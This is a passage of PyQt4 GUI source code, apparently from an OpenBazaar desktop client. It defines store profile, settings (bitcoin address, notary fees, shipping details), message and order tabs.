self.storeEmail = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
self.storeEmail.setFont(font)
self.storeEmail.setText(_fromUtf8(""))
self.storeEmail.setObjectName(_fromUtf8("storeEmail"))
self.gridLayout.addWidget(self.storeEmail, 1, 1, 1, 1)
self.storeName = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.storeName.setFont(font)
self.storeName.setText(_fromUtf8(""))
self.storeName.setObjectName(_fromUtf8("storeName"))
self.gridLayout.addWidget(self.storeName, 0, 1, 1, 1)
self.bitcoinReceivingAddress = QtGui.QTextEdit(self.gridLayoutWidget)
self.bitcoinReceivingAddress.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.bitcoinReceivingAddress.setObjectName(_fromUtf8("bitcoinReceivingAddress"))
self.gridLayout.addWidget(self.bitcoinReceivingAddress, 4, 1, 1, 1)
self.label = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(22)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.label_3 = QtGui.QLabel(self.gridLayoutWidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1)
self.label_2 = QtGui.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setPointSize(18)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
self.label_5 = QtGui.QLabel(self.gridLayoutWidget)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1)
self.storeDescription = QtGui.QTextEdit(self.gridLayoutWidget)
self.storeDescription.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.storeDescription.setObjectName(_fromUtf8("storeDescription"))
self.gridLayout.addWidget(self.storeDescription, 5, 1, 1, 1)
self.label_6 = QtGui.QLabel(self.gridLayoutWidget)
self.label_6.setObjectName(_fromUtf8("label_6"))
self.gridLayout.addWidget(self.label_6, 5, 0, 1, 1)
self.avatar_label = QtGui.QLabel(self)
self.avatar_label.setGeometry(QtCore.QRect(800, 20, 221, 211))
self.avatar_label.setText(_fromUtf8(""))
self.avatar_label.setObjectName(_fromUtf8("label_8"))
self.setWindowTitle(_translate("Form", "Form", None))
self.label_12.setText(_translate("Form", "My Listings:", None))
self.label.setText(_translate("Form", "User Name:", None))
self.label_3.setText(_translate("Form", "GUID:", None))
self.label_2.setText(_translate("Form", "User Email:", None))
self.label_5.setText(_translate("Form", "Bitcoin Receiving Address:", None))
self.label_6.setText(_translate("Form", "Store Description", None))
self.label_4.setText(_translate("Form", "Public Key:", None))
##
# Set values in this tab
self.storeName.setText(merchant_representation.get_name())
self.storeEmail.setText(merchant_representation.get_email())
self.storeDescription.setText(merchant_representation.get_description())
self.bitcoinReceivingAddress.setText(merchant_representation.get_bitcoin_address())
self.GUID.setText(merchant_representation.get_guid())
self.publicKey.setText(merchant_representation.get_key())
self.avatar_label.setPixmap(merchant_representation.get_avatar().get_repr().toqpixmap())
self.avatar_label.setScaledContents(True)
##
# This method describes the action to be taken when a contract hash is clicked
def contract_clicked(self, item):
##
# Try to get contract data from item
try:
ric_repr = item.data(QtCore.Qt.UserRole).toPyObject()
except:
print 'exception'
return
scroll_area = QtGui.QScrollArea()
scroll_area.setWidget(contractView_Tab(ric_repr))
self.window().add_tab(scroll_area, ric_repr.get_itemname())
##
# Settings_Ui2
# This class is the GUI for the settings tab
# @param settings_dict: holds all the current user settings for drawing on the widget
class Settings_Ui2(QtGui.QWidget):
def __init__(self, settings_dict):
super(Settings_Ui2, self).__init__()
self.setObjectName(_fromUtf8("Settings_Ui2"))
self.resize(800, 1300)
self.verticalLayoutWidget = QtGui.QWidget(self)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 771, 1201))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.gridLayout_5 = QtGui.QGridLayout()
self.gridLayout_5.setObjectName(_fromUtf8("gridLayout_5"))
self.email_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.email_lineEdit.setObjectName(_fromUtf8("email_lineEdit"))
self.gridLayout_5.addWidget(self.email_lineEdit, 1, 1, 1, 1)
self.email_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.email_label.setFont(font)
self.email_label.setObjectName(_fromUtf8("email_label"))
self.gridLayout_5.addWidget(self.email_label, 1, 0, 1, 1)
self.communication_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.communication_label.setFont(font)
self.communication_label.setObjectName(_fromUtf8("communication_label"))
self.gridLayout_5.addWidget(self.communication_label, 0, 0, 1, 1)
self.verticalLayout.addLayout(self.gridLayout_5)
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.bitcoin_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.bitcoin_lineEdit.setObjectName(_fromUtf8("bitcoin_lineEdit"))
self.gridLayout.addWidget(self.bitcoin_lineEdit, 2, 1, 1, 1)
self.store_desc_edit = QtGui.QTextEdit(self.verticalLayoutWidget)
self.store_desc_edit.setObjectName(_fromUtf8("store_desc_edit"))
self.gridLayout.addWidget(self.store_desc_edit, 3, 1, 1, 1)
self.nickname_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.nickname_label.setFont(font)
self.nickname_label.setObjectName(_fromUtf8("nickname_label"))
self.gridLayout.addWidget(self.nickname_label, 1, 0, 1, 1)
self.nickname_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.gridLayout.addWidget(self.nickname_lineEdit, 1, 1, 1, 1)
self.bitcoin_address_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.bitcoin_address_label.setFont(font)
self.bitcoin_address_label.setObjectName(_fromUtf8("bitcoin_address_label"))
self.gridLayout.addWidget(self.bitcoin_address_label, 2, 0, 1, 1)
self.store_details_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.store_details_label.setFont(font)
self.store_details_label.setObjectName(_fromUtf8("store_details_label"))
self.gridLayout.addWidget(self.store_details_label, 0, 0, 1, 1)
self.store_desc_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.store_desc_label.setFont(font)
self.store_desc_label.setObjectName(_fromUtf8("store_desc_label"))
self.gridLayout.addWidget(self.store_desc_label, 3, 0, 1, 1)
self.verticalLayout.addLayout(self.gridLayout)
self.gridLayout_3 = QtGui.QGridLayout()
self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
self.add_notary_label = QtGui.QPushButton(self.verticalLayoutWidget)
self.add_notary_label.setObjectName(_fromUtf8("add_notary_label"))
self.gridLayout_3.addWidget(self.add_notary_label, 4, 1, 1, 1)
self.known_notaries_label = QtGui.QLabel(self.verticalLayoutWidget)
self.known_notaries_label.setObjectName(_fromUtf8("known_notaries_label"))
self.gridLayout_3.addWidget(self.known_notaries_label, 3, 0, 1, 1)
self.trusted_notaries_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.trusted_notaries_label.setFont(font)
self.trusted_notaries_label.setObjectName(_fromUtf8("trusted_notaries_label"))
self.gridLayout_3.addWidget(self.trusted_notaries_label, 1, 0, 1, 1)
self.add_notary_line = QtGui.QLineEdit(self.verticalLayoutWidget)
self.add_notary_line.setObjectName(_fromUtf8("add_notary_line"))
self.gridLayout_3.addWidget(self.add_notary_line, 4, 0, 1, 1)
self.gridLayout_4 = QtGui.QGridLayout()
self.gridLayout_4.setObjectName(_fromUtf8("gridLayout_4"))
self.bitcoin_pubkey_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.bitcoin_pubkey_label.setFont(font)
self.bitcoin_pubkey_label.setObjectName(_fromUtf8("bitcoin_pubkey_label"))
self.gridLayout_4.addWidget(self.bitcoin_pubkey_label, 1, 0, 1, 1)
self.keys_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.keys_label.setFont(font)
self.keys_label.setObjectName(_fromUtf8("keys_label"))
self.gridLayout_4.addWidget(self.keys_label, 0, 0, 1, 1)
self.guid_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.guid_label.setFont(font)
self.guid_label.setObjectName(_fromUtf8("guid_label"))
self.gridLayout_4.addWidget(self.guid_label, 2, 0, 1, 1)
self.gpg_pubkey_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.gpg_pubkey_label.setFont(font)
self.gpg_pubkey_label.setObjectName(_fromUtf8("gpg_pubkey_label"))
self.gridLayout_4.addWidget(self.gpg_pubkey_label, 3, 0, 1, 1)
self.guid_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.guid_lineEdit.setObjectName(_fromUtf8("guid_lineEdit"))
self.gridLayout_4.addWidget(self.guid_lineEdit, 2, 1, 1, 1)
self.pubkey_textedit = QtGui.QTextEdit(self.verticalLayoutWidget)
self.pubkey_textedit.setObjectName(_fromUtf8("pubkey_textedit"))
self.gridLayout_4.addWidget(self.pubkey_textedit, 3, 1, 1, 1)
self.bitcoin_pubkey_textEdit = QtGui.QTextEdit(self.verticalLayoutWidget)
self.bitcoin_pubkey_textEdit.setObjectName(_fromUtf8("bitcoin_pubkey_textEdit"))
self.gridLayout_4.addWidget(self.bitcoin_pubkey_textEdit, 1, 1, 1, 1)
self.gridLayout_3.addLayout(self.gridLayout_4, 0, 0, 1, 1)
self.verticalLayout.addLayout(self.gridLayout_3)
self.gridLayout_2 = QtGui.QGridLayout()
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.notary_details_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.notary_details_label.setFont(font)
self.notary_details_label.setObjectName(_fromUtf8("notary_details_label"))
self.gridLayout_2.addWidget(self.notary_details_label, 0, 0, 1, 1)
self.notary_percent_about_label = QtGui.QTextBrowser(self.verticalLayoutWidget)
self.notary_percent_about_label.setAutoFillBackground(False)
self.notary_percent_about_label.setObjectName(_fromUtf8("notary_percent_about_label"))
self.gridLayout_2.addWidget(self.notary_percent_about_label, 2, 1, 1, 1)
self.buttonBox = QtGui.QDialogButtonBox(self.verticalLayoutWidget)
self.buttonBox.setLayoutDirection(QtCore.Qt.RightToLeft)
self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.No|QtGui.QDialogButtonBox.Yes)
self.buttonBox.setObjectName(_fromUtf8("buttonBox"))
self.gridLayout_2.addWidget(self.buttonBox, 1, 1, 1, 1)
self.percent_comboBox = QtGui.QComboBox(self.verticalLayoutWidget)
self.percent_comboBox.setObjectName(_fromUtf8("percent_comboBox"))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.percent_comboBox.addItem(_fromUtf8(""))
self.gridLayout_2.addWidget(self.percent_comboBox, 3, 1, 1, 1)
self.make_notary_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.make_notary_label.setFont(font)
self.make_notary_label.setObjectName(_fromUtf8("make_notary_label"))
self.gridLayout_2.addWidget(self.make_notary_label, 1, 0, 1, 1)
self.percent_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.percent_label.setFont(font)
self.percent_label.setLayoutDirection(QtCore.Qt.LeftToRight)
self.percent_label.setObjectName(_fromUtf8("percent_label"))
self.gridLayout_2.addWidget(self.percent_label, 3, 0, 1, 1)
self.service_description_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.service_description_label.setFont(font)
self.service_description_label.setObjectName(_fromUtf8("service_description_label"))
self.gridLayout_2.addWidget(self.service_description_label, 4, 0, 1, 1)
self.notary_servicedesc_textEdit = QtGui.QTextEdit(self.verticalLayoutWidget)
self.notary_servicedesc_textEdit.setObjectName(_fromUtf8("notary_servicedesc_textEdit"))
self.gridLayout_2.addWidget(self.notary_servicedesc_textEdit, 4, 1, 1, 1)
self.verticalLayout.addLayout(self.gridLayout_2)
self.gridLayout_6 = QtGui.QGridLayout()
self.gridLayout_6.setObjectName(_fromUtf8("gridLayout_6"))
self.shipping_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.shipping_label.setFont(font)
self.shipping_label.setObjectName(_fromUtf8("shipping_label"))
self.gridLayout_6.addWidget(self.shipping_label, 0, 0, 1, 1)
self.city_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.city_label.setFont(font)
self.city_label.setObjectName(_fromUtf8("city_label"))
self.gridLayout_6.addWidget(self.city_label, 5, 0, 1, 1)
self.recipient_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.recipient_label.setFont(font)
self.recipient_label.setObjectName(_fromUtf8("recipient_label"))
self.gridLayout_6.addWidget(self.recipient_label, 2, 0, 1, 1)
self.recipient_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.recipient_lineEdit.setObjectName(_fromUtf8("recipient_lineEdit"))
self.gridLayout_6.addWidget(self.recipient_lineEdit, 2, 1, 1, 1)
self.province_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.province_label.setFont(font)
self.province_label.setObjectName(_fromUtf8("province_label"))
self.gridLayout_6.addWidget(self.province_label, 6, 0, 1, 1)
self.zip_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.zip_label.setFont(font)
self.zip_label.setObjectName(_fromUtf8("zip_label"))
self.gridLayout_6.addWidget(self.zip_label, 7, 0, 1, 1)
self.street1_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.street1_label.setFont(font)
self.street1_label.setObjectName(_fromUtf8("street1_label"))
self.gridLayout_6.addWidget(self.street1_label, 3, 0, 1, 1)
self.street2_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.street2_label.setFont(font)
self.street2_label.setObjectName(_fromUtf8("street2_label"))
self.gridLayout_6.addWidget(self.street2_label, 4, 0, 1, 1)
self.country_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.country_label.setFont(font)
self.country_label.setObjectName(_fromUtf8("country_label"))
self.gridLayout_6.addWidget(self.country_label, 8, 0, 1, 1)
self.street1_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.gridLayout_6.addWidget(self.street1_lineEdit, 3, 1, 1, 1)
self.street2_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.street2_lineEdit.setObjectName(_fromUtf8("street2_lineEdit"))
self.gridLayout_6.addWidget(self.street2_lineEdit, 4, 1, 1, 1)
self.city_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.city_lineEdit.setObjectName(_fromUtf8("city_lineEdit"))
self.gridLayout_6.addWidget(self.city_lineEdit, 5, 1, 1, 1)
self.province_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.province_lineEdit.setObjectName(_fromUtf8("province_lineEdit"))
self.gridLayout_6.addWidget(self.province_lineEdit, 6, 1, 1, 1)
self.zip_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.zip_lineEdit.setObjectName(_fromUtf8("zip_lineEdit"))
self.gridLayout_6.addWidget(self.zip_lineEdit, 7, 1, 1, 1)
self.country_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.country_lineEdit.setObjectName(_fromUtf8("country_lineEdit"))
self.gridLayout_6.addWidget(self.country_lineEdit, 8, 1, 1, 1)
self.encryption_message = QtGui.QTextBrowser(self.verticalLayoutWidget)
self.encryption_message.setObjectName(_fromUtf8("encryption_message"))
self.gridLayout_6.addWidget(self.encryption_message, 1, 0, 1, 2)
self.verticalLayout.addLayout(self.gridLayout_6)
self.save_button = QtGui.QPushButton(self)
self.save_button.setGeometry(QtCore.QRect(680, 1220, 98, 27))
self.save_button.setObjectName(_fromUtf8("save_button"))
self.setWindowTitle(_translate("Form", "Form", None))
self.email_label.setText(_translate("Form", "Email", None))
self.communication_label.setText(_translate("Form", "Communication Info", None))
self.bitcoin_lineEdit.setText(_translate("Form", "Bitcoin address to send all incoming fees or refunds to", None))
self.store_desc_edit.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Enter a short description about your store</p></body></html>", None))
self.nickname_label.setText(_translate("Form", "Nickname", None))
self.bitcoin_address_label.setText(_translate("Form", "Bitcoin Receiving Address", None))
self.store_details_label.setText(_translate("Form", "Store Details", None))
self.store_desc_label.setText(_translate("Form", "Store Description", None))
self.add_notary_label.setText(_translate("Form", "Add", None))
self.known_notaries_label.setText(_translate("Form", "The addresses below are notaries used during transactions.", None))
self.trusted_notaries_label.setText(_translate("Form", "Trusted Notaries", None))
self.add_notary_line.setText(_translate("Form", "Enter a notary\'s OB guid", None))
self.bitcoin_pubkey_label.setText(_translate("Form", "Bitcoin Public Key (Uncompressed)", None))
self.keys_label.setText(_translate("Form", "OpenBazaar Keys", None))
self.guid_label.setText(_translate("Form", "OpenBazaar GUID", None))
self.gpg_pubkey_label.setText(_translate("Form", "PGP Public Key", None))
self.notary_details_label.setText(_translate("Form", "Notary Details", None))
self.notary_percent_about_label.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-weight:600;\">Fees</span></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">If your services are needed during a dispute, a fee can be requested from the participants of the transaction you are involved with. What percentage of each transaction would you like to request for your services?</p></body></html>", None))
self.percent_comboBox.setItemText(0, _translate("Form", "0", None))
self.percent_comboBox.setItemText(1, _translate("Form", "1", None))
self.percent_comboBox.setItemText(2, _translate("Form", "2", None))
self.percent_comboBox.setItemText(3, _translate("Form", "3", None))
self.percent_comboBox.setItemText(4, _translate("Form", "4", None))
self.percent_comboBox.setItemText(5, _translate("Form", "5", None))
self.percent_comboBox.setItemText(6, _translate("Form", "6", None))
self.percent_comboBox.setItemText(7, _translate("Form", "7", None))
self.percent_comboBox.setItemText(8, _translate("Form", "8", None))
self.percent_comboBox.setItemText(9, _translate("Form", "9", None))
self.percent_comboBox.setItemText(10, _translate("Form", "10", None))
self.make_notary_label.setText(_translate("Form", "Make me a notary", None))
self.percent_label.setText(_translate("Form", "%", None))
self.service_description_label.setText(_translate("Form", "Description of your services", None))
self.shipping_label.setText(_translate("Form", "Shipping Information", None))
self.city_label.setText(_translate("Form", "City", None))
self.recipient_label.setText(_translate("Form", "Recipient Name", None))
self.recipient_lineEdit.setText(_translate("Form", "Name visible on your package", None))
self.province_label.setText(_translate("Form", "Province/Region", None))
self.zip_label.setText(_translate("Form", "Zip", None))
self.street1_label.setText(_translate("Form", "Street 1", None))
self.street2_label.setText(_translate("Form", "Street 2", None))
self.country_label.setText(_translate("Form", "Country", None))
self.encryption_message.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Note: This information will be encrypted and only be sent to your seller when you have marked your order for payment.</p></body></html>""", None))
self.save_button.setText(_translate("Form", "Save Changes", None))
##
# Fill in existing user settings
#
self.email_lineEdit.setText(settings_dict['email'])
self.nickname_lineEdit.setText(settings_dict['nickname'])
self.bitcoin_lineEdit.setText(settings_dict['bitcoinReceivingAddress'])
self.store_desc_edit.setText(settings_dict['storeDescription'])
self.pubkey_textedit.setText(settings_dict['pubkey'])
self.notary_servicedesc_textEdit.setText(settings_dict['description'])
self.percent_comboBox.setCurrentIndex(int(settings_dict['percentage']))
self.recipient_lineEdit.setText(settings_dict['shippingInformation']['recipient'])
self.street1_lineEdit.setText(settings_dict['shippingInformation']['street1'])
self.street2_lineEdit.setText(settings_dict['shippingInformation']['street2'])
self.city_lineEdit.setText(settings_dict['shippingInformation']['city'])
self.province_lineEdit.setText(settings_dict['shippingInformation']['province/state/region'])
self.zip_lineEdit.setText(settings_dict['shippingInformation']['postal/zip'])
self.country_lineEdit.setText(settings_dict['shippingInformation']['country'])
self.guid_lineEdit.setText(settings_dict['guid'].encode('hex'))
self.save_button.clicked.connect(self.saveChanges)
##
# saveChanges(self)
# Collects all filled in user data and sends to settings for saving
def saveChanges(self):
ret = dict()
ret['nickname'] = self.nickname_lineEdit.text()
ret['email'] = self.email_lineEdit.text()
ret['bitcoinReceivingAddress'] = self.bitcoin_lineEdit.text()
ret['storeDescription'] = self.store_desc_edit.toPlainText()
ret['percentage'] = str(self.percent_comboBox.currentIndex())
ret['description'] = self.notary_servicedesc_textEdit.toPlainText()
shipping = dict()
shipping['recipient'] = self.recipient_lineEdit.text()
shipping['street1'] = self.street1_lineEdit.text()
shipping['street2'] = self.street2_lineEdit.text()
shipping['city'] = self.city_lineEdit.text()
shipping['province/state/region'] = self.province_lineEdit.text()
shipping['postal/zip'] = self.zip_lineEdit.text()
shipping['country'] = self.country_lineEdit.text()
ret['shippingInformation'] = shipping
ret['avatarURL'] = ""
ret['myMerchants'] = ""
ret['isNotary'] = ""
self.window().id_module.set_settings(ret)
self.window().redraw()
##
# This class contains the UI for the "Send a message" tab
#
class SendMessage_Ui2(QtGui.QWidget):
##
# Constructor
# Creates the "Send Message" tab
def __init__(self):
super(SendMessage_Ui2, self).__init__()
self.setObjectName(_fromUtf8("Form"))
self.resize(400, 413)
self.verticalLayoutWidget = QtGui.QWidget(self)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 381, 391))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.send_message_label = QtGui.QLabel(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.send_message_label.setFont(font)
self.send_message_label.setObjectName(_fromUtf8("keys_label"))
self.verticalLayout.addWidget(self.send_message_label)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.label = QtGui.QLabel(self.verticalLayoutWidget)
self.label.setObjectName(_fromUtf8("store_details_label"))
self.horizontalLayout.addWidget(self.label)
self.lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.lineEdit.setObjectName(_fromUtf8("nickname_lineEdit"))
self.horizontalLayout.addWidget(self.lineEdit)
self.verticalLayout.addLayout(self.horizontalLayout)
self.message_subject_lineEdit = QtGui.QLineEdit(self.verticalLayoutWidget)
self.message_subject_lineEdit.setObjectName(_fromUtf8("bitcoin_lineEdit"))
self.verticalLayout.addWidget(self.message_subject_lineEdit)
self.message_body_textEdit = QtGui.QTextEdit(self.verticalLayoutWidget)
self.message_body_textEdit.setObjectName(_fromUtf8("store_desc_edit"))
self.verticalLayout.addWidget(self.message_body_textEdit)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
spacerItem = QtGui.QSpacerItem(100, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem)
self.cancel_button = QtGui.QPushButton(self.verticalLayoutWidget)
self.cancel_button.setObjectName(_fromUtf8("add_notary_label"))
self.horizontalLayout_2.addWidget(self.cancel_button)
self.send_button = QtGui.QPushButton(self.verticalLayoutWidget)
self.send_button.setAutoFillBackground(False)
self.send_button.setObjectName(_fromUtf8("save_button"))
self.horizontalLayout_2.addWidget(self.send_button)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.setWindowTitle(_translate("Form", "Form", None))
self.send_message_label.setText(_translate("Form", "Send Message", None))
self.label.setText(_translate("Form", "To:", None))
self.message_subject_lineEdit.setText(_translate("Form", "Enter a subject line", None))
self.message_body_textEdit.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Ubuntu\'; font-size:11pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Enter a message</p></body></html>", None))
self.cancel_button.setText(_translate("Form", "Cancel", None))
self.send_button.setText(_translate("Form", "Send", None))
##
# This class contains the UI for the "My Orders" menu
#
class Ui_OrdersMenu(object):
##
#
def setupUi(self, OrdersMenu):
OrdersMenu.setObjectName(_fromUtf8("OrdersMenu"))
OrdersMenu.resize(400, 300)
self.verticalLayoutWidget = QtGui.QWidget(OrdersMenu)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 381, 281))
self.verticalLayoutWidget.setObjectName(_fromUtf8("verticalLayoutWidget"))
self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.OrderLabel = QtGui.QLabel(self.verticalLayoutWidget)
self.OrderLabel.setObjectName(_fromUtf8("OrderLabel"))
self.verticalLayout.addWidget(self.OrderLabel)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.seller = QtGui.QListView(self.verticalLayoutWidget)
self.seller.setObjectName(_fromUtf8("seller"))
self.horizontalLayout.addWidget(self.seller)
self.sellerBar = QtGui.QScrollBar(self.verticalLayoutWidget)
self.sellerBar.setOrientation(QtCore.Qt.Vertical)
self.sellerBar.setObjectName(_fromUtf8("sellerBar"))
self.horizontalLayout.addWidget(self.sellerBar)
self.buyerBar = QtGui.QScrollBar(self.verticalLayoutWidget)
self.buyerBar.setOrientation(QtCore.Qt.Vertical)
self.buyerBar.setObjectName(_fromUtf8("buyerBar"))
self.horizontalLayout.addWidget(self.buyerBar)
self.buyer = QtGui.QListView(self.verticalLayoutWidget)
self.buyer.setObjectName(_fromUtf8("buyer"))
self.horizontalLayout.addWidget(self.buyer)
self.verticalLayout.addLayout(self.horizontalLayout)
self.retranslateUi(OrdersMenu)
QtCore.QMetaObject.connectSlotsByName(OrdersMenu)
def retranslateUi(self, OrdersMenu):
OrdersMenu.setWindowTitle(_translate("OrdersMenu", "Form", None))
self.OrderLabel.setText(_translate("OrdersMenu", "Orders", None))
##
# ContractGenUi2
# This class holds the UI for the contract generator
class ContractGenUi2(QtGui.QWidget):
##
# Constructor
# Draws the layout of the "New Contract" tab
